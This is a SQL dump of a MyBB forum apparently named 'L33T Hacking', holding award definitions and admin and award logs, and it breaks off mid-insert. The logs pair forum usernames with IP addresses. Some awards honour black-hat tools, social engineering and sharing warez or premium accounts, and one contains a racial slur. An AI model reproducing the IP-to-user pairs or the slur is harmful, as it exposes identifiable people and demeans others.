DROP TABLE IF EXISTS mybb_achivements_achivement; CREATE TABLE mybb_achivements_achivement ( aaid smallint(5) unsigned NOT NULL auto_increment, name varchar(50) NOT NULL, description text NOT NULL, image varchar(250) NOT NULL, achivements text NOT NULL, PRIMARY KEY (aaid) ); INSERT INTO mybb_achivements_achivement VALUES('1', 'Rich Bitch', 'You have helped keep LH up with your great donations.', 'inc/plugins/achivements/upload/achivement_21_10_12_12_22_02.png', 'a:1:{s:4:\"acid\";a:4:{i:2;a:1:{s:4:\"acid\";s:1:\"2\";}i:3;a:1:{s:4:\"acid\";s:1:\"3\";}i:4;a:1:{s:4:\"acid\";s:1:\"4\";}i:5;a:1:{s:4:\"acid\";s:1:\"5\";}}}'); DROP TABLE IF EXISTS mybb_achivements_custom; CREATE TABLE mybb_achivements_custom ( acid smallint(5) unsigned NOT NULL auto_increment, name varchar(50) NOT NULL, reason text NOT NULL, image varchar(250) NOT NULL, modcp int(10) NOT NULL, PRIMARY KEY (acid) ); INSERT INTO mybb_achivements_custom VALUES('1', 'SE Legend', 'Social Engineering and/or Manipulation Pro.', 'inc/plugins/achivements/upload/custom_20_10_12_11_54_35.png', '1'); INSERT INTO mybb_achivements_custom VALUES('2', 'Stingy ', 'You have donated at least $5 to L33T Hacking.', 'inc/plugins/achivements/upload/custom_20_10_12_11_58_23.png', '0'); INSERT INTO mybb_achivements_custom VALUES('3', 'Emerald Donator', 'User donated $10-20 to LH.', 'inc/plugins/achivements/upload/custom_20_10_12_11_59_47.png', '0'); INSERT INTO mybb_achivements_custom VALUES('4', 'Fav mod donate', 'This user has donated money to their favorite mod.', 'inc/plugins/achivements/upload/custom_21_10_12_12_00_20.png', '0'); INSERT INTO mybb_achivements_custom VALUES('5', 'Master Donator', 'Has donated $50+ to LH. This excludes sticky purchases and upgrades (AIO)', 'inc/plugins/achivements/upload/custom_21_10_12_12_01_03.png', '0'); INSERT INTO mybb_achivements_custom VALUES('6', 'Black Hat', 'A proven black hat gets this award.', 'inc/plugins/achivements/upload/custom_21_10_12_12_02_07.png', '0'); INSERT INTO mybb_achivements_custom VALUES('7', 'Dangerous Programmer ', 'Create and give away 3+ blackhat tools and/or programs for free on LH. This excludes Chat Spammer, Doxer and resolver. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_04_38.png', '1'); INSERT INTO mybb_achivements_custom VALUES('8', 'Angel', 'Has done well helping others. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png', '1'); INSERT INTO mybb_achivements_custom VALUES('9', 'Referrer ', 'You have referred 10 or more members. All must be activated. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_07_10.png', '1'); INSERT INTO mybb_achivements_custom VALUES('10', 'MOTM', 'Member of the Month Trophy. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_07_39.jpg', '0'); INSERT INTO mybb_achivements_custom VALUES('27', 'Elite', 'Special Award to signify Elite Status', 'inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png', '0'); INSERT INTO mybb_achivements_custom VALUES('26', 'Sticky', 'Made a thread worth a sticky.', 'inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png', '1'); INSERT INTO mybb_achivements_custom VALUES('13', 'Gamer', 'You are too addicted to gaming.', 'inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif', '1'); INSERT INTO mybb_achivements_custom VALUES('14', 'Swag', 'Nigga mad flee. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png', '1'); INSERT INTO mybb_achivements_custom VALUES('15', 'Silver Brick', 'Earn this by posting a great original tutorial.', 'inc/plugins/achivements/upload/custom_21_10_12_12_18_16.png', '1'); INSERT INTO mybb_achivements_custom VALUES('16', 'Gold Brick', 'Earn this by upload amazing files to LH.', 'inc/plugins/achivements/upload/custom_21_10_12_12_19_48.png', '1'); INSERT INTO mybb_achivements_custom VALUES('17', 'Reporter', 'Has reported a lot of SPAM on LH. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_22_36.png', '0'); INSERT INTO mybb_achivements_custom VALUES('18', 'Advanced BH Contributor', 'Has shared a lot of warez or premium accounts.', 'inc/plugins/achivements/upload/custom_21_10_12_12_23_54.png', '0'); INSERT INTO mybb_achivements_custom VALUES('19', 'Genius', 'If you just have too much knowledge.', 'inc/plugins/achivements/upload/custom_21_10_12_12_25_10.png', '0'); INSERT INTO mybb_achivements_custom VALUES('20', 'Thinker', 'Has made an excellent suggestion to help improve LH.', 'inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png', '0'); INSERT INTO mybb_achivements_custom VALUES('21', 'Music Fan', 'You like listening to music. Not easy to get :P', 'inc/plugins/achivements/upload/custom_21_10_12_12_28_47.png', '1'); INSERT INTO mybb_achivements_custom VALUES('22', 'Painter', 'Good at graphic designing. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_57_04.png', '1'); INSERT INTO mybb_achivements_custom VALUES('23', 'Ass Kisser', 'Self-Explainatory', 'inc/plugins/achivements/upload/custom_21_10_12_1_35_58.png', '1'); INSERT INTO mybb_achivements_custom VALUES('24', 'YouTube', 'Create a YouTube video advertising LH, include your UID in the video.', 'inc/plugins/achivements/upload/custom_21_10_12_1_44_00.png', '1'); INSERT INTO mybb_achivements_custom VALUES('25', 'Diamond', 'It\'s an award for those who are HQ members and have contributed a lot to the community also helped a lot of members. Members with this award are and will always be respected by the admins of LH. ', 'inc/plugins/achivements/upload/custom_21_10_12_1_48_27.jpg', '0'); DROP TABLE IF EXISTS mybb_achivements_customlog; CREATE TABLE mybb_achivements_customlog ( lid smallint(5) unsigned NOT NULL auto_increment, user int(10) NOT NULL, dateline bigint(30) NOT NULL, log text NOT NULL, ipaddress varchar(50) NOT NULL, PRIMARY KEY (lid) ); INSERT INTO mybb_achivements_customlog VALUES('1', '1', '1350860127', 'Log eliminated', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('2', '1', '1350862204', 'Achieving Elite has been delivered to the user HoverCatz', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('3', '1', '1350862214', 'Achieving Elite has been delivered to the user mothered', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('4', '1', '1350862283', 'Achieving Elite has been delivered to the user PiXEL^OG', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('5', '1', '1350862293', 'Achieving Elite has been delivered to the user sbhshroy2', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('6', '1', '1350862313', 'Achieving Elite has been delivered to the user Timmy', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('7', '1', '1350862325', 'Achieving Elite has been delivered to the user ƒ???????????g', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('8', '1', '1350862336', 'Achieving Elite has been delivered to the user ??zg???g????61', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('9', '1', '1350862351', 'Achieving Elite has been delivered to the user xEP1C_SC0P3Sx', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('10', '1', '1350862664', 'Achieving Elite has been delivered to the user sirchamp', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('11', '1', '1350862676', 'Achieving Elite has been delivered to the user R?????zo?', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('12', '1', '1350862684', 'Achieving Elite has been delivered to the user NXK', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('13', '1', '1350862696', 'Achieving Elite has been delivered to the user iTzIpod', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('14', '1', '1350862828', 'Achieving Gamer has been delivered to the user xEP1C_SC0P3Sx', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('15', '2', '1350875035', 'Achieving Painter has been delivered to the user Apathy', '173.206.138.180'); INSERT INTO mybb_achivements_customlog VALUES('16', '61', '1350875466', 'Achieving SE Legend has been delivered to the user ƒ???????????g', '99.253.94.204'); INSERT INTO mybb_achivements_customlog VALUES('17', '61', '1350875491', 'Achieving Painter has been delivered to the user ƒ???????????g', '99.253.94.204'); INSERT INTO mybb_achivements_customlog VALUES('18', '61', '1350875532', 'Achieving Swag has been delivered to the user ƒ???????????g', '99.253.94.204'); INSERT INTO mybb_achivements_customlog VALUES('19', '61', '1350875556', 'Achieving Dangerous Programmer has been delivered to the user NXK', '99.253.94.204'); INSERT INTO mybb_achivements_customlog VALUES('20', '61', '1350875568', 'Achieving Swag has been delivered to the user NXK', '99.253.94.204'); INSERT INTO mybb_achivements_customlog VALUES('21', '1', '1351621456', 'Achieving Elite has been delivered to the user Mac Miller', '72.231.24.165'); INSERT INTO mybb_achivements_customlog VALUES('22', '61', '1352328180', 'Achieving Fav mod donate has been delivered to the user HoverCatz', '99.252.235.12'); INSERT INTO mybb_achivements_customlog VALUES('23', '1', '1352535383', 'Achieving YouTube has been delivered to the user Timmy', '72.231.24.165'); DROP TABLE IF EXISTS mybb_achivements_posts; CREATE TABLE mybb_achivements_posts ( apid smallint(5) unsigned NOT NULL auto_increment, name varchar(50) NOT NULL, description varchar(200) NOT NULL, posts int(10) NOT NULL, image varchar(250) NOT NULL, PRIMARY KEY (apid) ); INSERT INTO mybb_achivements_posts VALUES('1', 'Spammer', 'Given to those who have reached 1,000 posts.', '1000', 'inc/plugins/achivements/upload/posts_21_10_12_12_10_50.png'); INSERT INTO mybb_achivements_posts VALUES('2', 'Posting Freak', 'This user has 500+ posts.', '500', 'inc/plugins/achivements/upload/posts_21_10_12_12_30_32.png'); INSERT INTO mybb_achivements_posts VALUES('3', 'Cheers on 100', 'User has reached 100 posts', '100', 'inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png'); DROP TABLE IF EXISTS mybb_achivements_regdate; CREATE TABLE mybb_achivements_regdate ( rgid smallint(5) unsigned NOT NULL auto_increment, name varchar(50) NOT NULL, description varchar(200) NOT NULL, regdate int(10) NOT NULL, regdatetype varchar(120) NOT NULL, image varchar(250) NOT NULL, PRIMARY KEY (rgid) ); DROP TABLE IF EXISTS mybb_achivements_reputation; CREATE TABLE mybb_achivements_reputation ( arid smallint(5) unsigned NOT NULL auto_increment, name varchar(50) NOT NULL, description varchar(200) NOT NULL, reputation int(10) NOT NULL, image varchar(250) NOT NULL, PRIMARY KEY (arid) ); DROP TABLE IF EXISTS mybb_achivements_threads; CREATE TABLE mybb_achivements_threads ( atid smallint(5) unsigned NOT NULL auto_increment, name varchar(50) NOT NULL, description varchar(200) NOT NULL, threads int(10) NOT NULL, image varchar(250) NOT NULL, PRIMARY KEY (atid) ); INSERT INTO mybb_achivements_threads VALUES('1', 'Contributor ', 'Granted to those who have reached 100 threads.', '100', 'inc/plugins/achivements/upload/threads_21_10_12_12_11_32.png'); INSERT INTO mybb_achivements_threads VALUES('2', '10 Threads', 'This user has posted 10 threads.', '10', 'inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg'); DROP TABLE IF EXISTS mybb_achivements_timeonline; CREATE TABLE mybb_achivements_timeonline ( toid smallint(5) unsigned NOT NULL auto_increment, name varchar(50) NOT NULL, description varchar(200) NOT NULL, timeonline int(10) NOT NULL, timeonlinetype varchar(120) NOT NULL, image varchar(250) NOT NULL, PRIMARY KEY (toid) ); INSERT INTO mybb_achivements_timeonline VALUES('1', 'No life', 'This member has no life and is too addicted to LH.', '6', 'months', 'inc/plugins/achivements/upload/timeonline_21_10_12_1_45_52.png'); DROP TABLE IF EXISTS mybb_adminlog; CREATE TABLE mybb_adminlog ( uid int(10) unsigned NOT NULL, ipaddress varchar(50) NOT NULL, dateline bigint(30) NOT NULL, module varchar(50) NOT NULL, action varchar(50) NOT NULL, data text NOT NULL, KEY module (module,action) ); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352144644', 'config-plugins', 'deactivate', 'a:2:{i:0;s:16:\"username_history\";i:1;b:0;}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352013193', 'tools-modlog', 'prune', 'a:5:{i:0;s:1:\"0\";i:1;i:0;i:2;i:-1;i:3;i:23;i:4;N;}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352013184', 'tools-adminlog', 'prune', 'a:4:{i:0;s:1:\"0\";i:1;i:0;i:2;s:0:\"\";i:3;i:42;}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352180532', 'config-badwords', 'add', 'a:2:{i:0;i:14;i:1;s:10:\"*lthackin*\";}'); INSERT INTO mybb_adminlog VALUES('1', '173.245.64.95', '1352183147', 'forum-tabmenu', '', 'a:0:{}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352244545', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_d3a3b5a2aaXFi93M85M7Vilp2XJ1SdwanEhTvL2jL69xtLZtrnvtJyS5bGX8AYtQ.sql.gz\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352244547', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_949baf3a6bwEA4S8yO9RdxpydO2YslGb8gtJgAFSoyG52xusQkPB6h4nyxVLgVnt.sql.gz\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352244550', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_a4d56077b8UGSpnEuAVygPJv667SJwGgfwOhevvYhGNBAt17J8cwzDp6ACI4aTZN.sql.gz\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352253203', 'user-users', 'ipaddresses', 'a:2:{i:0;s:3:\"326\";i:1;s:10:\"coolkid192\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352253766', 'user-users', 'edit', 'a:2:{i:0;s:3:\"302\";i:1;s:10:\"Mac Miller\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352253994', 'user-users', 'merge', 'a:4:{i:0;s:3:\"326\";i:1;s:10:\"coolkid192\";i:2;s:3:\"302\";i:3;s:10:\"Mac Miller\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352254307', 'user-users', 'merge', 'a:4:{i:0;s:3:\"290\";i:1;s:4:\"Boss\";i:2;s:3:\"302\";i:3;s:10:\"Mac Miller\";}'); INSERT INTO mybb_adminlog VALUES('61', '99.252.235.12', '1352254422', 'config-banning', 'add', 'a:3:{i:0;i:88;i:1;s:12:\"71.67.179.16\";i:2;s:1:\"1\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352258991', 'user-banning', '', 'a:3:{i:0;s:3:\"328\";i:1;s:6:\"Miller\";i:2;i:0;}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352259499', 'tools/pms', 'delete', 'a:1:{i:4038;s:1:\"2\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352350002', 'forum-management', 'edit', 'a:2:{i:0;i:69;i:1;s:7:\"General\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352350408', 'tools/pms', 'delete', 'a:4:{i:4039;s:3:\"302\";i:4042;s:3:\"328\";i:4047;s:2:\"62\";i:4048;s:2:\"67\";}'); INSERT INTO mybb_adminlog VALUES('1', '165.155.212.92', '1352478317', 'user-users', 'inline_activated', 'a:1:{i:0;i:1;}'); INSERT INTO mybb_adminlog VALUES('1', '165.155.212.92', '1352478379', 'tools-mailerrors', 'prune', 'a:1:{i:0;i:4;}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352517141', 'user-users', 'inline_activated', 'a:1:{i:0;i:1;}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352520382', 'config-settings', 'change', 'a:0:{}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352520393', 'config-settings', 'change', 'a:0:{}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352520702', 'config-settings', 'change', 'a:0:{}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352521755', 'forum-attachments', 'delete_orphans', 'a:0:{}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352521815', 'forum-attachments', 'delete', 'a:3:{i:0;s:1:\"2\";i:1;s:5:\"1.png\";i:2;s:3:\"237\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352521815', 'forum-attachments', 'delete', 'a:3:{i:0;s:1:\"3\";i:1;s:5:\"2.png\";i:2;s:3:\"237\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352521815', 'forum-attachments', 'delete', 'a:3:{i:0;s:1:\"4\";i:1;s:5:\"3.png\";i:2;s:3:\"237\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352521815', 'forum-attachments', 'delete', 'a:3:{i:0;s:1:\"5\";i:1;s:6:\"ms.png\";i:2;s:4:\"3179\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352526415', 'user-users', 'edit', 'a:2:{i:0;s:1:\"4\";i:1;s:8:\"Triple H\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352529037', 'forum-management', 'add', 'a:2:{i:0;i:84;i:1;s:23:\"Other Premium Giveaways\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352529388', 'forum-management', 'edit', 'a:2:{i:0;i:30;i:1;s:17:\"Premium Downloads\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352530596', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352534435', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_2cc8c3de83zPQEftSYayMGwx2XwTCx2tOFBcPYjo4SYmGbVBKTkfeP2hLuXe6P1f.sql.gz\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352534438', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_2036347b018IS7ERdYAgZrAVwXKCRCQBex9clY4pnz3EEmb5mELGJN6hXozz5BZv.sql.gz\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352534441', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_5f3a52e271VXCEqRh6NIvuOpinLagSozuYmvARBrkxuZueIRvv6ZoJQnSvWlYj1A.sql.gz\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352577597', 'style-templates', 'edit_template', 'a:4:{i:0;N;i:1;s:6:\"report\";i:2;i:8;i:3;s:21:\"Coder Green Templates\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578004', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578040', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578212', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578501', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578556', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578600', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578626', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578697', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578743', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352578762', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352661859', 'tools-tasks', 'run', 'a:2:{i:0;s:1:\"9\";i:1;s:9:\"Mass Mail\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352661940', 'user-users', 'inline_activated', 'a:1:{i:0;i:6;}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352679969', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_73d5ea97e0L7I14yfTODXqvcPBINCAYbKPQargVrjBxke1lyAxwM4sktmwKBZJxc.sql.gz\";}'); INSERT INTO mybb_adminlog VALUES('1', '72.231.24.165', '1352681184', 'config-settings', 'change', 'a:0:{}'); DROP TABLE IF EXISTS mybb_adminoptions; CREATE TABLE mybb_adminoptions ( uid int(11) NOT NULL, cpstyle varchar(50) NOT NULL, codepress int(1) DEFAULT '1' NOT NULL, notes text NOT NULL, permissions text NOT NULL, defaultviews text NOT NULL, loginattempts int(10) unsigned NOT NULL, loginlockoutexpiry int(10) unsigned NOT NULL, PRIMARY KEY (uid) ); INSERT INTO mybb_adminoptions VALUES('0', '', '1', '', 'a:6:{s:6:\"config\";a:17:{s:3:\"tab\";s:1:\"0\";s:8:\"settings\";s:1:\"0\";s:7:\"banning\";s:1:\"0\";s:14:\"profile_fields\";s:1:\"0\";s:7:\"smilies\";s:1:\"0\";s:8:\"badwords\";s:1:\"0\";s:6:\"mycode\";s:1:\"0\";s:9:\"languages\";s:1:\"0\";s:10:\"post_icons\";s:1:\"0\";s:14:\"help_documents\";s:1:\"0\";s:7:\"plugins\";s:1:\"0\";s:16:\"attachment_types\";s:1:\"0\";s:9:\"mod_tools\";s:1:\"0\";s:7:\"spiders\";s:1:\"0\";s:9:\"calendars\";s:1:\"0\";s:7:\"warning\";s:1:\"0\";s:15:\"thread_prefixes\";s:1:\"0\";}s:5:\"forum\";a:5:{s:3:\"tab\";s:1:\"0\";s:10:\"management\";s:1:\"0\";s:13:\"announcements\";s:1:\"0\";s:16:\"moderation_queue\";s:1:\"0\";s:11:\"attachments\";s:1:\"0\";}s:5:\"style\";a:3:{s:3:\"tab\";s:1:\"0\";s:6:\"themes\";s:1:\"0\";s:9:\"templates\";s:1:\"0\";}s:5:\"tools\";a:19:{s:3:\"tab\";s:1:\"0\";s:13:\"system_health\";s:1:\"0\";s:5:\"cache\";s:1:\"0\";s:5:\"tasks\";s:1:\"0\";s:8:\"backupdb\";s:1:\"0\";s:10:\"optimizedb\";s:1:\"0\";s:8:\"adminlog\";s:1:\"0\";s:6:\"modlog\";s:1:\"0\";s:15:\"recount_rebuild\";s:1:\"0\";s:8:\"php_info\";s:1:\"1\";s:8:\"maillogs\";s:1:\"0\";s:10:\"mailerrors\";s:1:\"0\";s:10:\"warninglog\";s:1:\"0\";s:10:\"statistics\";s:1:\"0\";s:17:\"file_verification\";s:1:\"0\";s:6:\"ip_man\";i:0;s:3:\"pms\";i:0;s:10:\"sticky_man\";i:0;s:13:\"monthly_stats\";i:0;}s:4:\"user\";a:8:{s:3:\"tab\";s:1:\"0\";s:5:\"users\";s:1:\"0\";s:6:\"groups\";s:1:\"0\";s:6:\"titles\";s:1:\"0\";s:7:\"banning\";s:1:\"0\";s:17:\"admin_permissions\";s:1:\"0\";s:9:\"mass_mail\";s:1:\"0\";s:16:\"group_promotions\";s:1:\"0\";}s:11:\"achivements\";a:11:{i:1;i:0;s:5:\"posts\";i:0;s:7:\"threads\";i:0;s:10:\"reputation\";i:0;s:10:\"timeonline\";i:0;s:7:\"regdate\";i:0;s:6:\"custom\";i:0;s:11:\"achivements\";i:0;s:8:\"settings\";i:0;s:10:\"extensions\";i:0;s:6:\"config\";i:0;}}', 'a:1:{s:4:\"user\";s:1:\"1\";}', '0', '0'); INSERT INTO mybb_adminoptions VALUES('-4', '', '1', '', 'a:5:{s:11:\"achivements\";a:10:{s:5:\"posts\";s:1:\"1\";s:7:\"threads\";s:1:\"1\";s:10:\"reputation\";s:1:\"1\";s:10:\"timeonline\";s:1:\"1\";s:7:\"regdate\";s:1:\"1\";s:6:\"custom\";s:1:\"1\";s:11:\"achivements\";s:1:\"1\";s:8:\"settings\";s:1:\"0\";s:10:\"extensions\";s:1:\"0\";s:6:\"config\";s:1:\"0\";}s:6:\"config\";a:16:{s:8:\"settings\";s:1:\"0\";s:7:\"banning\";s:1:\"1\";s:14:\"profile_fields\";s:1:\"1\";s:7:\"smilies\";s:1:\"1\";s:8:\"badwords\";s:1:\"1\";s:6:\"mycode\";s:1:\"1\";s:9:\"languages\";s:1:\"1\";s:10:\"post_icons\";s:1:\"1\";s:14:\"help_documents\";s:1:\"0\";s:7:\"plugins\";s:1:\"0\";s:16:\"attachment_types\";s:1:\"1\";s:7:\"spiders\";s:1:\"1\";s:9:\"calendars\";s:1:\"1\";s:7:\"warning\";s:1:\"0\";s:9:\"mod_tools\";s:1:\"0\";s:15:\"thread_prefixes\";s:1:\"1\";}s:5:\"forum\";a:5:{s:10:\"management\";s:1:\"0\";s:13:\"announcements\";s:1:\"1\";s:16:\"moderation_queue\";s:1:\"1\";s:11:\"attachments\";s:1:\"1\";s:7:\"tabmenu\";s:1:\"0\";}s:4:\"user\";a:8:{s:5:\"users\";s:1:\"1\";s:6:\"groups\";s:1:\"1\";s:6:\"titles\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:17:\"admin_permissions\";s:1:\"0\";s:9:\"mass_mail\";s:1:\"0\";s:16:\"group_promotions\";s:1:\"1\";s:16:\"username_history\";s:1:\"1\";}s:5:\"tools\";a:18:{s:13:\"system_health\";s:1:\"0\";s:5:\"cache\";s:1:\"1\";s:5:\"tasks\";s:1:\"1\";s:8:\"backupdb\";s:1:\"1\";s:10:\"optimizedb\";s:1:\"0\";s:15:\"recount_rebuild\";s:1:\"1\";s:8:\"adminlog\";s:1:\"0\";s:6:\"modlog\";s:1:\"0\";s:8:\"maillogs\";s:1:\"1\";s:10:\"mailerrors\";s:1:\"1\";s:10:\"warninglog\";s:1:\"1\";s:8:\"php_info\";s:1:\"1\";s:17:\"file_verification\";s:1:\"1\";s:10:\"statistics\";s:1:\"1\";s:9:\"modreplog\";s:1:\"1\";s:3:\"pms\";s:1:\"0\";s:10:\"sticky_man\";s:1:\"0\";s:13:\"monthly_stats\";s:1:\"1\";}}', 'a:1:{s:4:\"user\";s:1:\"1\";}', '0', '0'); INSERT INTO mybb_adminoptions VALUES('1', 'default', '1', '', 'a:6:{s:5:\"style\";a:2:{s:6:\"themes\";s:1:\"1\";s:9:\"templates\";s:1:\"1\";}s:5:\"tools\";a:19:{s:13:\"system_health\";s:1:\"1\";s:5:\"cache\";s:1:\"1\";s:5:\"tasks\";s:1:\"1\";s:8:\"backupdb\";s:1:\"1\";s:10:\"optimizedb\";s:1:\"1\";s:15:\"recount_rebuild\";s:1:\"1\";s:8:\"adminlog\";s:1:\"1\";s:6:\"modlog\";s:1:\"1\";s:8:\"maillogs\";s:1:\"1\";s:10:\"mailerrors\";s:1:\"1\";s:10:\"warninglog\";s:1:\"1\";s:8:\"php_info\";s:1:\"1\";s:17:\"file_verification\";s:1:\"1\";s:10:\"statistics\";s:1:\"1\";s:9:\"modreplog\";s:1:\"1\";s:6:\"ip_man\";s:1:\"1\";s:3:\"pms\";i:1;s:10:\"sticky_man\";i:1;s:13:\"monthly_stats\";i:1;}s:4:\"user\";a:10:{s:5:\"users\";s:1:\"1\";s:6:\"groups\";s:1:\"1\";s:6:\"titles\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:17:\"admin_permissions\";s:1:\"1\";s:9:\"mass_mail\";s:1:\"1\";s:16:\"group_promotions\";s:1:\"1\";s:16:\"username_history\";s:1:\"1\";s:6:\"awards\";s:1:\"1\";s:10:\"iplhsearch\";s:1:\"1\";}s:6:\"config\";a:16:{s:8:\"settings\";s:1:\"1\";s:7:\"banning\";s:1:\"1\";s:14:\"profile_fields\";s:1:\"1\";s:7:\"smilies\";s:1:\"1\";s:8:\"badwords\";s:1:\"1\";s:6:\"mycode\";s:1:\"1\";s:9:\"languages\";s:1:\"1\";s:10:\"post_icons\";s:1:\"1\";s:14:\"help_documents\";s:1:\"1\";s:7:\"plugins\";s:1:\"1\";s:16:\"attachment_types\";s:1:\"1\";s:7:\"spiders\";s:1:\"1\";s:9:\"calendars\";s:1:\"1\";s:7:\"warning\";s:1:\"1\";s:9:\"mod_tools\";s:1:\"1\";s:15:\"thread_prefixes\";s:1:\"1\";}s:5:\"forum\";a:5:{s:10:\"management\";s:1:\"1\";s:13:\"announcements\";s:1:\"1\";s:16:\"moderation_queue\";s:1:\"1\";s:11:\"attachments\";s:1:\"1\";s:7:\"tabmenu\";s:1:\"1\";}s:11:\"achivements\";a:11:{i:1;i:1;s:5:\"posts\";i:0;s:7:\"threads\";i:0;s:10:\"reputation\";i:0;s:10:\"timeonline\";i:0;s:7:\"regdate\";i:0;s:6:\"custom\";i:0;s:11:\"achivements\";i:0;s:8:\"settings\";i:0;s:10:\"extensions\";i:0;s:6:\"config\";i:0;}}', 'a:1:{s:4:\"user\";s:1:\"1\";}', '0', '0'); INSERT INTO mybb_adminoptions VALUES('2', '', '1', '', 